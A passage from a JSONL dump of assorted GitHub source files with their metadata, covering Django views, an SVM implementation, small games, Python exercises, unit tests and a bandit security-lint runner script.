__call__(self, blackbox_function: BlackboxFunction) -> bool:\n \"\"\"\n\n Returns\n -------\n bool\n true if the maximal iterations are reached and false otherwise\n\n\n \"\"\"\n if self._iteration_step < self._max_iterations:\n self._iteration_step += 1\n return False\n\n else:\n return True\n","repo_name":"nicolaipalm/paref","sub_path":"paref/moo_algorithms/stopping_criteria/max_iterations_reached.py","file_name":"max_iterations_reached.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29527356612","text":"# Create your views here.\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nimport pdb\nimport urllib\nimport json\nfrom django.utils.safestring import SafeString\nimport csv\n\ndef home(request):\n\treturn render(request, 'D3/home.html', {})\n\ndef d3_visual(request):\n\turl = \"http://localhost:8983/solr/collection1/select?q=*&rows=500&wt=json&indent=true\"\n\tresponse = urllib.urlopen(url);\n\tdata = json.loads(response.read())\n\n\t#print json.dumps(data['response'], indent=4)\n\t\n\tresponse = data[\"response\"]\n\tdocs = response[\"docs\"]\n\t\n\tpie_dict = {}\n\td3_data = []\n\tfor each in docs:\n\t\tif \"title\" not in each:\n\t\t\tcontinue\n\t\td3_data += [{'id':each[\"id\"], 'title':each[\"title\"][0], 'content_type':each[\"content_type\"][0], 'content_length':len(each[\"content\"][0])}]\n\t\tif each[\"content_type\"][0] in pie_dict:\n\t\t\tpie_dict[each[\"content_type\"][0]] += 1\n\t\telse:\n\t\t\tpie_dict[each[\"content_type\"][0]] = 1\n\n\t# creating pie chart file\n\tf = open(\"./D3/static/D3/pie.csv\",\"w\")\n\tf.write(\"age,population\\n\")\n\tfor each in pie_dict:\n\t\tf.write(str(each) + \",\" + str(pie_dict[each]) + \"\\n\")\n\tf.close()\n\n\t# Creating bar chart file\n\tf = open(\"./D3/static/D3/bar.tsv\",\"w\")\n\tf.write(\"letter,frequency\\n\")\n\ti = 0\n\tfor each in docs:\n\t\tif i>100:\n\t\t\tbreak\n\t\ti += 1\n\t\tf.write( \"File\" + str(i) + \",\" + str(len(each[\"content\"][0])) + \"\\n\")\n\tf.close()\n\n\treturn HttpResponse(json.dumps({\"d3_data\":d3_data}), content_type=\"application/json\")\n\ndef banana_visual(request):\n\treturn render(request, 'D3/banana_visual.html', {})\n\ndef facetview_visual(request):\n\treturn render(request, 'D3/facetview_visual.html', {})\n","repo_name":"suhassub/DataVisualiztion-D3","sub_path":"IR3/D3/views_copy.py","file_name":"views_copy.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3499589112","text":"from subprocess import check_call, CalledProcessError\nimport argparse\nimport os\nimport logging\nimport sys\n\nfrom ci_tools.environment_exclusions import (\n is_check_enabled\n)\nfrom ci_tools.variables import in_ci\n\nlogging.getLogger().setLevel(logging.INFO)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Run bandit against target folder.\")\n\n parser.add_argument(\n \"-t\",\n \"--target\",\n dest=\"target_package\",\n help=\"The target package directory on disk. The target module passed to bandit will be <target_package>/azure.\",\n required=True,\n )\n\n args = parser.parse_args()\n package_name = os.path.basename(os.path.abspath(args.target_package))\n\n if in_ci():\n if not is_check_enabled(args.target_package, \"bandit\"):\n logging.info(\n f\"Package {package_name} opts-out of bandit check.\"\n )\n exit(0)\n\n try:\n check_call(\n [\n sys.executable,\n \"-m\",\n \"bandit\",\n \"-r\",\n os.path.join(args.target_package, \"azure\"),\n \"-ll\",\n ]\n )\n except CalledProcessError as e:\n logging.error(\"{} exited with error {}\".format(package_name, e.returncode))\n exit(1)\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"eng/tox/run_bandit.py","file_name":"run_bandit.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"16911399184","text":"\"\"\"Write a Python program to create and display all combinations of letters,\nselecting each letter from a different key in a dictionary. Go to the editor\nSample data : {'1':['a','b'], '2':['c','d']}\nExpected Output:\nac\nad\nbc\nbd\nClick me to see the sample solution\"\"\"\nl = {'1':['a','b'], '2':['c','d']}\n\n\n\"\"\"Write a Python program to find the highest 3 values in a dictionary. \"\"\"\nfrom collections import Counter\nN = int(input())\nd = {'ravi':'10','rajnish':'9','sanjeev':'15','yash':'2','suraj':'32','neha':'7','harsh':'25'}\ndd = {key:int(value) for key,value in d.items()}\nprint(dict(Counter(dd).most_common(N)))\n\n\"\"\"Write a Python program to combine values in python list of dictionaries. Go to the editor\nSample data: [{'item': 'item1', 'amount': 400}, {'item': 'item2', 'amount': 300}, {'item': 'item1', 'amount': 750}]\nExpected Output: Counter({'item1': 1150, 'item2': 300})\"\"\"\n\n\"\"\"Write a Python program to create a dictionary from a string. Go to the editor\nNote: Track the count of the letters from the string.\nSample string : 'w3resource'\nExpected output: {'3': 1, 's': 1, 'r': 2, 'u': 1, 'w': 1, 'c': 1, 'e': 2, 'o': 1}\"\"\"\ns= 'w3resource'\nk = Counter(s)\nprint(k)\n\n\"\"\"Write a Python program to get the top three items in a shop. Go to the editor\nSample data: {'item1': 45.50, 'item2':35, 'item3': 41.30, 'item4':55, 'item5': 24}\nExpected Output:\nitem4 55\nitem1 45.5\nitem3 41.3\"\"\"\nd1 = {'item1': 45.50, 'item2':35, 'item3': 41.30, 'item4':55, 'item5': 24}\nk1 = dict(Counter(d1).most_common(N))\nprint(k1)","repo_name":"nekapoor7/Python-and-Django","sub_path":"Python/Dir/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23322123921","text":"'''\r\nRock beats scissors Scissors beats paper Paper beats rock\r\nSample Input 0\r\n\r\nAmrit\r\nRavi\r\nRock\r\nScissor\r\nSample Output 0\r\n\r\nAmrit Win\r\nSample Input 1\r\n\r\nAbdul\r\nShikha\r\nPaper\r\nRock\r\n'''\r\na=input()\r\nb=input()\r\nc=input()\r\nd=input()\r\nif(c==\"Scissor\"):\r\n if(d==\"Rock\"):\r\n print(b,\"Win\")\r\n else:\r\n print(a,\"Win\")\r\nelif(c==\"Paper\"):\r\n if(d==\"Scissor\"):\r\n print(b,\"Win\")\r\n else:\r\n print(a,\"Win\")\r\nelse:\r\n if(d==\"Scissor\"):\r\n print(a,\"Win\")\r\n else:\r\n print(b,\"Win\")\r\n \r\n","repo_name":"NitinSikarwar-32/Practice-1","sub_path":"Python Practice1/Rock_paper_scissors.py","file_name":"Rock_paper_scissors.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38578571767","text":"import django_filters\nfrom django import forms\nfrom .models import *\nfrom Shop.models import *\n\n\nclass order_filter (django_filters.FilterSet):\n CHOISE_PRODUCT = [item.name for item in Product.objects.all ( )]\n\n start_date = django_filters.DateFilter (field_name='order__creation_date', lookup_expr='gte',\n widget=forms.TextInput (attrs={\n 'placeholder': 'Start Date', 'class': 'input-group-text',\n 'type': 'date'}),\n label='')\n end_date = django_filters.DateFilter (field_name='order__creation_date', lookup_expr='lte',\n widget=forms.TextInput (attrs={\n 'placeholder': 'End Date', 'class': 'input-group-text', 'type': 'date'}),\n label='')\n user = django_filters.CharFilter (field_name='user', lookup_expr='icontains', widget=forms.TextInput (attrs={\n 'class': 'input-group-text', 'placeholder': 'Seller'}),\n label='')\n\n class Meta:\n model = OrderItem\n fields = []\n filter_overrides = {\n models.DateField: {\n 'filter_class': django_filters.DateFilter,\n 'extra': lambda f: {\n 'widget': forms.DateField,\n }\n }}\n\n\nclass product_filter (django_filters.FilterSet):\n name = django_filters.CharFilter (field_name='name', lookup_expr='icontains', widget=forms.TextInput (attrs={\n 'placeholder': 'Product Name', 'class': 'input-group-text', 'type': 'Text'}), label='')\n category = django_filters.ChoiceFilter (field_name='category',\n choices=[(i.id, i.name) for i in SubCategory.objects.all ( )],\n )\n\n\nclass Meta:\n model = Product\n fields = []\n filter_overrides = {\n models.ImageField: {\n 'filter_class': django_filters.CharFilter,\n 'extra': lambda f: {\n 'lookup_expr': 'icontains',\n }}}\n","repo_name":"smnshzh/Warehouse","sub_path":"cart/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10616180478","text":"import unittest\n\nfrom alfpy import wmetric\nfrom alfpy.utils import distmatrix\nfrom alfpy.utils.data import subsmat\n\nfrom . import utils\n\n\nclass VectorTest(unittest.TestCase):\n\n def test_count_seq_chars(self):\n seq = 'MKSTGWHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n expl = [0, 0, 0, 0, 1, 2, 1, 0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 1, 0, 0]\n self.assertEqual(l, expl)\n\n def test_count_seq_chars_pep_ambiguous(self):\n seq = 'MKSTGWXXXXXXXOOOOOOOHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n expl = [0, 0, 0, 0, 1, 2, 1, 0, 1, 0, 1, 0, 0, 0, 2, 1, 0, 1, 0, 0]\n self.assertEqual(l, expl)\n\n def test_freq_seq_chars(self):\n seq = 'MKSTGWXXXXXXXOOOOOOOHFSG'\n l = wmetric.count_seq_chars(seq, utils.ALPHABET_PEP)\n freq = wmetric.freq_seq_chars(l)\n expfreq = [0.0, 0.0, 0.0, 0.0, 0.1, 0.2, 0.1, 0.0, 0.1, 0.0,\n 0.1, 0.0, 0.0, 0.0, 0.2, 0.1, 0.0, 0.1, 0.0, 0.0]\n self.assertEqual(freq, expfreq)\n\n\nclass DistanceTest(unittest.TestCase, utils.ModulesCommonTest):\n\n def __init__(self, *args, **kwargs):\n super(DistanceTest, self).__init__(*args, **kwargs)\n utils.ModulesCommonTest.set_test_data()\n\n def test_wmetric_blosum62(self):\n # The result of this method is identical to that from decaf+py.\n matrix = subsmat.get('blosum62')\n dist = wmetric.Distance(self.pep_records, matrix)\n matrix = distmatrix.create(self.pep_records.id_list, dist)\n data = [' 4',\n 'seq1 0.0000000 0.0392559 0.0783026 0.1261381',\n 'seq2 0.0392559 0.0000000 0.0377364 0.1166475',\n 'seq3 0.0783026 0.0377364 0.0000000 0.1677386',\n 'seq4 0.1261381 0.1166475 0.1677386 0.0000000']\n self.assertEqual(matrix.format(), \"\\n\".join(data))\n\n def test_wmetric_pam250(self):\n matrix = subsmat.get('pam250')\n dist = wmetric.Distance(self.pep_records, matrix)\n matrix = distmatrix.create(self.pep_records.id_list, dist)\n data = [' 4',\n 'seq1 0.0000000 0.0289700 0.0467580 0.0353781',\n 'seq2 0.0289700 0.0000000 0.0227122 0.0372699',\n 'seq3 0.0467580 0.0227122 0.0000000 0.0578383',\n 'seq4 0.0353781 0.0372699 0.0578383 0.0000000']\n self.assertEqual(matrix.format(), \"\\n\".join(data))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"aziele/alfpy","sub_path":"tests/test_wmetric.py","file_name":"test_wmetric.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"74093515360","text":"import random\nimport re\n\nclass allrange:\n def __init__(self, string, var_type=None ):\n self.length = 0\n self.var_type = var_type\n \n string = str(string)\n value = string.split(\",\")\n if value.count('')==2:\n value.append(',')\n value = [i for i in value if i!='']\n\n self.data = []\n for v in value:\n if \"-\"==v:\n self.data.append(v)\n self.length+=1\n elif \"-\" in v and v.rfind('-')!=0:\n if v.count(\"-\")==1:\n lower_bound,upper_bound = v.split(\"-\")\n else:\n (ind,_) = re.search(r\"\\d(-)\",v).span(1)\n lower_bound = v[:ind]\n upper_bound = v[ind+1:]\n\n if var_type == str:\n if lower_bound.isdigit() or (len(lower_bound)>1 and lower_bound[0]=='-' and lower_bound[1:].isdigit()):\n self.data.append([range(int(lower_bound),int(upper_bound)+1),str])\n self.length += int(upper_bound) - int(lower_bound) + 1\n else:\n self.data.append([range(ord(lower_bound),ord(upper_bound)+1),chr])\n self.length += ord(upper_bound) - ord(lower_bound) + 1\n elif var_type == int:\n self.data.append([range(int(lower_bound),int(upper_bound)+1),int])\n self.length += int(upper_bound) - int(lower_bound) + 1\n\n else:\n self.data.append(var_type(v))\n self.length+=1\n # print(self.data)\n\n def __len__(self):\n return self.length\n \n def __getitem__(self,key):\n for d in self.data:\n if type(d) == list:\n if key < d[0][-1] - d[0][0] + 1:\n return d[1](d[0][key])\n key -= d[0][-1] - d[0][0] + 1\n else:\n if key == 0:\n return d\n key-=1\n raise Exception(\"Key out of range\")\n \n def get_lower_random(self,k):\n new_data = []\n new_data_length = 0\n for d in self.data:\n if type(d) == list:\n if d[0][0] > k:\n break\n elif d[0][-1] <=k:\n new_data.append(d)\n new_data_length += d[0][-1] - d[0][0] + 1\n else:\n new_data.append([range(d[0][0],k+1),d[1]])\n new_data_length += k - d[0][0] + 1\n else:\n if d<=k:\n new_data.append(d)\n new_data_length+=1\n else:\n break\n \n if len(new_data)==0:\n raise Exception(\"No suitable length found for unique values\")\n # print(new_data)\n ind = random.randint(0,new_data_length-1)\n for d in new_data:\n if type(d) == list:\n if ind < d[0][-1] - d[0][0] + 1:\n return d[1](d[0][ind])\n ind -= d[0][-1] - d[0][0] + 1\n else:\n if ind == 0:\n return d\n ind-=1\n\n\n def random(self,k=None):\n values=[]\n if k==None:\n tk = 1\n else:\n tk = k\n for _ in range(tk):\n values.append(self[random.randint(0,self.length-1)])\n if k==None:\n return values[0]\n else :\n return values\n","repo_name":"biswajitpatra/Testcase-Generator","sub_path":"server/range_class.py","file_name":"range_class.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38616239838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 23 15:14:29 2017\n\n@author: dom,jantschi,marcel,stef\n\"\"\"\n\nimport numpy as np\n\nfilename_example = 'input/example.in'\nfilename_small = 'input/small.in'\nfilename_medium = 'input/medium.in'\nfilename_big = 'input/big.in'\n\nwith open(filename_small, mode='r') as file: # b is important -> binary\n fileContent = file.read()\nfile.close()\n\nnr_cols = int(fileContent[0])\nnr_rows = int(fileContent[2])\n\nfileContent = fileContent.replace(\"\\n\", \"\")\npizzaContent = fileContent[7:]\npizzaContent = np.array(list(pizzaContent))\npizza_matrix = np.reshape(pizzaContent, (nr_cols, nr_rows))\n\n\nprint ('write file')\nout_path = 'input/output.in'\nfo = open(out_path, \"w\")\n\n#for ind in range(0,np.size(pizza_matrix,0)):\n# fo.write( str(pizza_matrix[ind,:])+ \"\\n\");\n # Close file\nfo.write(str(3) + \"\\n\" + str(0) + \" \" + str(0) + \" \"+str(2) + \" \" +\n str(1) + \"\\n\" + str(0) + \" \" + str(2)+ \" \" + str(2)+ \" \" +\n str(2) + \"\\n\" + str(0) + \" \" +str(3) + \" \" +str(2) + \" \"+ str(4))\nfo.close()\n\nprint(\"done\")\n","repo_name":"dosc919/google_hashcode","sub_path":"practice/Pizza_ex.py","file_name":"Pizza_ex.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70254815201","text":"import numpy as np\nimport pandas as pd\nfrom cvxopt import matrix as cvx_matrix\nfrom cvxopt import solvers as cvx_solvers\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\nDataset = pd.read_csv('./2017EE10436.csv',header=None);\nnum_features = 10\nF = Dataset.iloc[:,:num_features].values\nT = Dataset.iloc[:,-1].values\n\nlabel1 = 0\nlabel2 = 1\nF1 = []\nT1 = []\nfor k in range(0,len(T)):\n\tif(T[k]==label1):\n\t\tF1.append(F[k])\n\t\tT1.append(-1)\n\telif(T[k]==label2):\n\t\tF1.append(F[k])\n\t\tT1.append(1)\nF1 = np.asarray(F1)\nT1 = np.asarray(T1)\n\ndef linear(x1,x2):\n\treturn np.dot(x1,x2)\n\ndef polynomial(x1,x2,p):\n\treturn np.power((1+np.dot(x1,x2)),p)\n\ndef gaussian(x1,x2,gamma):\n\treturn np.exp(-1*gamma*(np.linalg.norm(x1-x2)**2))\n\nclass SVM(object):\n\tdef __init__(self,kernel='linear',C=None,p=4,gamma=1):\n\t\tself.kernel = kernel\n\t\tself.C = C\n\t\tself.p = p\n\t\tself.gamma = gamma\n\t\tif self.C is not None:\n\t\t\tself.C = float(self.C)\n\t\n\tdef fit(self,X,Y):\n\t\tn_samples = X.shape[0]\n#\t\tn_features = X.shape[1]\n\t\t\n\t\tK = np.zeros((n_samples,n_samples))\n\t\tif self.kernel is 'linear':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = linear(X[i],X[j])\n\t\t\n\t\telif self.kernel is 'poly':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = polynomial(X[i],X[j],self.p)\n\t\t\n\t\telif self.kernel is 'rbf':\n\t\t\tfor i in range(n_samples):\n\t\t\t\tfor j in range(n_samples):\n\t\t\t\t\tK[i,j] = gaussian(X[i],X[j],self.gamma)\n\t\t\n\t\telse:\n\t\t\traise Exception('Invalid kernel')\n\t\t\n\t\t#Declaring parameters for CVX solvers\n\t\tP = cvx_matrix(np.outer(Y,Y)* K)\n\t\tq = cvx_matrix(-np.ones((n_samples,1)))\n\t\tY = Y.astype('double')\n\t\tA = cvx_matrix(Y.reshape((1,-1)))\n\t\tb = cvx_matrix(0.0)\n\t\t\n\t\tif self.C is None:\n\t\t\tG = cvx_matrix(-np.identity(n_samples))\n\t\t\th = cvx_matrix(np.zeros((n_samples,1)))\t\n\t\telse:\n\t\t\tt1 = -np.identity(n_samples)\n\t\t\tt2 = np.identity(n_samples)\n\t\t\tG = cvx_matrix(np.vstack((t1,t2)))\n\t\t\tt1 = np.zeros((n_samples,1))\n\t\t\tt2 = np.ones((n_samples,1))*self.C\n\t\t\th = cvx_matrix(np.vstack((t1,t2)))\n\t\t\n\t\tanswer = cvx_solvers.qp(P,q,G,h,A,b)\n\t\tlag_mul = np.ravel(answer['x'])\n\t\tsupport_vectors = lag_mul>1e-5\n\t\tindexes = np.arange(len(lag_mul))\n\t\tlag_indexes = indexes[support_vectors]\n\t\tself.lag_mul = lag_mul[support_vectors]\n\t\tself.sv_x = X[support_vectors]\n\t\tself.support_vectors_=self.sv_x.astype()\n#\t\tfor i in range(self.sv_x.shape[0]):\n#\t\t\tself.support_vectors_.append(float(self.sv_x[i]))\n\t\tprint(self.support_vectors_)\n\t\tself.sv_y = Y[support_vectors]\n#\t\tprint(self.sv_x,self.sv_y)\n\t\tprint('No. of support vectors = '+str(len(self.lag_mul)))\n\t\t\n\t\t#intercept\n\t\tself.b = 0\n\t\tfor i in range(len(self.lag_mul)):\n#\t\t\tprint(K[lag_indexes[i],lag_indexes].shape)\n\t\t\tself.b = self.sv_y[i] - np.sum(self.lag_mul*self.sv_y*K[lag_indexes[i],lag_indexes])\n#\t\t\tprint(self.b)\n\t\tself.b = self.b/len(self.lag_mul)\n\t\t\n\tdef y_prediction(self,X):\n\t\ty_pred = np.zeros(X.shape[0])\n\t\tprint(X.shape[0])\n\t\tif self.kernel is 'linear':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*linear(X[i],self.sv_x[j])\n\t\t\n\t\telif self.kernel is 'poly':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*polynomial(X[i],self.sv_x[j],self.p)\n\t\t\n\t\telif self.kernel is 'rbf':\n\t\t\tfor i in range(X.shape[0]):\n\t\t\t\tfor j in range(len(self.lag_mul)):\n\t\t\t\t\ty_pred[i] += self.lag_mul[j]*self.sv_y[j]*gaussian(X[i],self.sv_x[j],self.gamma)\n\t\t\n\t\treturn y_pred+self.b\n\t\n\tdef predict(self,X):\n\t\ty_p = self.y_prediction(X)\n\t\ty_ans = np.zeros(X.shape[0])\n\t\tfor i in range(len(y_p)):\n\t\t\tif y_p[i] >= 0:\n\t\t\t\ty_ans[i] = 1\n\t\t\telif y_p[i] < 0:\n\t\t\t\ty_ans[i] = -1\n\t\treturn y_ans\n\t\t\n\t\t\n\t\t\nif __name__ == \"__main__\":\n\tdef conventionalMethod(X,Y):\n\t\tX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.30,random_state=100)\n\t\tclassifier = SVM(kernel='linear',C=0.1)\n\t\tclassifier.fit(X_train,y_train)\n\t\ty_pred = classifier.predict(X_test)\n\t\taccuracy = metrics.accuracy_score(y_test,y_pred)\n\t\tprint('Accuracy is ='+str(accuracy))\n\t\n\tconventionalMethod(F1,T1)\n\t\t","repo_name":"AmanTiwari1503/SVM-Design","sub_path":"BinaryCVX.py","file_name":"BinaryCVX.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42460909019","text":"import os\r\nclear = lambda: os.system(\"cls\")\r\n\r\ndef tictactoe():\r\n clear()\r\n \r\n play_again = True\r\n print(\"Game is now starting:\")\r\n while play_again:\r\n board = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\r\n x = 1 # for player counting 1/2\r\n print('PLAYER ', x, ':Enter your Marker')\r\n marker = input()\r\n player_1, player_2 = set_marker(marker)\r\n while True:\r\n if x > 2:\r\n x = 1\r\n print('PLAYER ', x, ':Enter your position')\r\n pos = int(input())\r\n # Checking whether the position is not previously filled\r\n if not check_pos(pos, board):\r\n continue\r\n\r\n if x == 1:\r\n set_board(board, player_1, pos)\r\n else:\r\n set_board(board, player_2, pos)\r\n\r\n dispboard(board)\r\n if x == 1:\r\n if check_win(board, player_1):\r\n print('Player', x, 'Won the match')\r\n break\r\n else:\r\n if check_win(board, player_2):\r\n print('Player', x, 'Won the match')\r\n break\r\n\r\n if not check_space(board): # check if there is no space in board\r\n print('Draw!!!')\r\n break\r\n\r\n x = x + 1\r\n\r\n if not replay():\r\n play_again = False\r\n\r\n\r\ndef set_board(board, marker, pos):\r\n board[pos] = marker\r\n return board\r\n\r\n\r\ndef check_win(board, marker):\r\n return board[1] == marker and board[2] == marker and board[3] == marker or board[4] == marker and board[5] == marker and board[6] == marker or board[7] == marker and board[8] == marker and board[9] == marker or board[1] == marker and board[4] == marker and board[7] == marker or board[2] == marker and board[5] == marker and board[8] == marker or board[3] == marker and board[6] == marker and board[9] == marker or board[1] == marker and board[5] == marker and board[9] == marker or board[3] == marker and board[5] == marker and board[7] == marker\r\n\r\n\r\ndef dispboard(board):\r\n clear()\r\n print(f' {board[1]} | {board[2]} | {board[3]}')\r\n print('-------------')\r\n print(f' {board[4]} | {board[5]} | {board[6]}')\r\n print('-------------')\r\n print(f' {board[7]} | {board[8]} | {board[9]}')\r\n\r\n\r\ndef replay():\r\n print('Do you want to play again Y/N ')\r\n ans = input('y/n')\r\n return ans == 'Y' or ans == 'y'\r\n\r\n\r\ndef set_marker(marker):\r\n if marker == 'X':\r\n return ('X', 'O')\r\n else:\r\n return ('O', 'X')\r\n\r\n\r\ndef check_pos(pos, board):\r\n if board[pos] != ' ':\r\n print('Position is already filled')\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef check_space(board):\r\n for i in range(1, 10):\r\n if board[i] == ' ':\r\n return True\r\n return False\r\n\r\ntictactoe()\r\n","repo_name":"deepjoy9/TicTacToe-Python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2035957418","text":"import argparse\nfrom Bio import SeqIO\nfrom Bio.SeqUtils import gc_fraction\nimport matplotlib.pyplot as plt\n\ndef plot_gc_content(input_file):\n gc_values = sorted(\n 100 * gc_fraction(rec.seq) for rec in SeqIO.parse(input_file, \"fasta\")\n )\n\n plt.plot(gc_values)\n plt.title(\n \"%i sequences\\nGC%% %0.1f to %0.1f\"\n % (len(gc_values), min(gc_values), max(gc_values))\n )\n plt.xlabel(\"Genes\")\n plt.ylabel(\"GC%\")\n plt.show()\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Plot GC content of sequences.\")\n parser.add_argument(\"-f\", \"--file\", required=True, help=\"Input FASTA file\")\n args = parser.parse_args()\n\n plot_gc_content(args.file)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Health-Universe/Biopython-Sequence-Parsing-Plots","sub_path":"PlotofSequenceGC.py","file_name":"PlotofSequenceGC.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17643652215","text":"from datetime import datetime\nfrom django.db.models import (\n Count, \n DateTimeField, \n CharField,\n Q,\n Count,\n Sum,\n)\nfrom django.db.models.functions import (\n Cast,\n Substr,\n TruncHour,\n TruncDay,\n TruncWeek, \n TruncMonth, \n TruncYear,\n)\nfrom rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom apps.sales.models import Pos\nfrom .models import Restaurant\nfrom .serializer import RestaurantSerializer, RestaurantPaymentKPISerializer, PosSerializer\n\n\n# Restaurnat 데이터 생성 및 전체 리스트 조회 API\nclass RestaurantListAPIView(generics.ListCreateAPIView):\n '''\n Assignee : 장우경\n Reviewer : 홍은비\n '''\n queryset = Restaurant.objects.all()\n serializer_class = RestaurantSerializer\n\n\n# Restaurnat 상세 정보 조회, 수정(업데이트), 삭제 API\nclass RestaurantDetailAPIView(generics.RetrieveUpdateDestroyAPIView):\n '''\n Assignee : 장우경\n Reviewer : -\n '''\n queryset = Restaurant.objects.all()\n serializer_class = RestaurantSerializer\n\n\n# Restaurant별 일행 수에 따른 KPI\nclass KPIPerRestaurantAPIView(APIView):\n '''\n Assignee : 장우경\n Reviewer : 홍은비, 진병수\n '''\n def get(self, request):\n try:\n start_time = datetime.strptime(request.GET.get('start_time', None), '%Y-%m-%d').date()\n end_time = datetime.strptime(request.GET.get('end_time', None), '%Y-%m-%d').date()\n except TypeError:\n return Response({'message': '날짜를 입력해주세요'}, status=status.HTTP_404_NOT_FOUND)\n min_party = request.GET.get('min_party', None)\n max_party = request.GET.get('max_party', None)\n group_id = request.GET.get('group_id', None)\n # min_price = request.GET.get('min_price', None)\n # max_price = request.GET.get('max_price', None)\n \n q = Q()\n \n # 시간 지정하여 조회 \n if start_time and end_time:\n q &= Q(created_datetime__gte=start_time, created_datetime__lte=end_time)\n \n # 인원별 조회\n if min_party and max_party:\n q &= Q(number_of_party__gte=min_party, number_of_party__lte=max_party)\n\n # 그룹별 조회\n if group_id:\n q &= Q(restaurant__group=group_id)\n \n pos_queryset = Pos.objects.filter(q).values('number_of_party')\\\n .annotate(num_count=Count('number_of_party'))\\\n .values('restaurant_id', 'number_of_party', 'num_count', 'restaurant__group')\n \n serializer = PosSerializer(pos_queryset, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass RestaurantPaymentKPIView(APIView):\n '''\n Assignee : 홍은비\n Reviewer : 장우경, 진병수, 김수빈\n '''\n def get(self, request):\n pos = Pos.objects.all()\n \n # Filter 1: Start Time / End Time\n \n start_time = request.GET.get('start_time', None)\n end_time = request.GET.get('end_time', None)\n\n if start_time and end_time:\n try:\n start_time = datetime.strptime(start_time, '%Y-%m-%d').date()\n end_time = datetime.strptime(end_time, '%Y-%m-%d').date()\n # end_time 은 포함되지 않아 icontains 조건을 추가해 임의로 포함시킴.\n pos = pos.filter(Q(created_datetime__range=(start_time,end_time)) | Q(created_datetime__icontains=end_time))\n except ValueError:\n return Response('[날짜 형식 오류] 날짜를 yyyy-mm-dd 형식으로 요청해주십시오.', status=404)\n\n\n # Filter 2: Price range\n\n min_price = request.GET.get('min_price', None)\n max_price = request.GET.get('max_price', None)\n\n if min_price and max_price:\n pos = pos.annotate(total_price=Sum('menu__price')).values('id', 'total_price')\\\n .filter(total_price__gte=min_price, total_price__lte=max_price)\n\n\n # Filter 3: Number of party\n\n min_party = request.GET.get('min_party', None)\n max_party = request.GET.get('max_party', None)\n if min_party and max_party:\n pos = pos.filter(number_of_party__gte=min_party, number_of_party__lte=max_party)\n\n\n # Filter 4: Restaurant group\n \n group = request.GET.get('group', None)\n if group:\n pos = pos.filter(restaurant__group__name=group)\n \n\n # HOUR, DAY, WEEK, MONTH, YEAR\n\n window_size = request.GET.get('window_size', None)\n window_type = ['HOUR', 'DAY', 'WEEK', 'MONTH', 'YEAR']\n\n if not window_size in window_type:\n return Response('[window size 타입 오류] window size는 HOUR, DAY, WEEK, MONTH, YEAR 중 하나여야합니다.', status=404)\n\n if window_size == 'HOUR':\n pos = pos.annotate(hour=\n Substr(\n Cast(TruncHour('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 12, 2)\n ).values('hour')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'hour')\n\n elif window_size == 'DAY':\n pos = pos.annotate(day=\n Substr(\n Cast(TruncDay('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 9, 2)\n ).values('day')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'day')\n\n elif 